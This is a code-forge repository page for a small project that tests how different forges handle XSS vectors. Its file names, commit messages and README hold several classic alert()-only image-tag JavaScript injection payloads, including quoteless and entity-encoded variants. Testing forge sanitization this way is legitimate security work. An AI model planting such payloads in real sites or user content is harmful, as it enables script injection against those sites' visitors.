A repo to locate XSS in forges
Go to file
Julien Palard 6e262c3b28
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
2022-10-12 16:57:03 +02:00
<IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> 2022-10-12 16:57:03 +02:00
<IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert('XSS')> 2022-10-12 16:57:03 +02:00
<IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> 2022-10-12 16:57:03 +02:00
README.md <IMG SRC=javascript:alert('XSS')> 2022-10-12 16:57:03 +02:00

README.md

Doodling around XSS

This is just a repo to test some play around XSS vectors on different forges.

Just pull this repo, push this to a forge, and browse it to see how it behave.

Yes I did not spent much time adding vectors, feel free to open PRs.

Basic one

Quoteless

Double-quote less

<IMG SRC=javascript:alert('XSS')>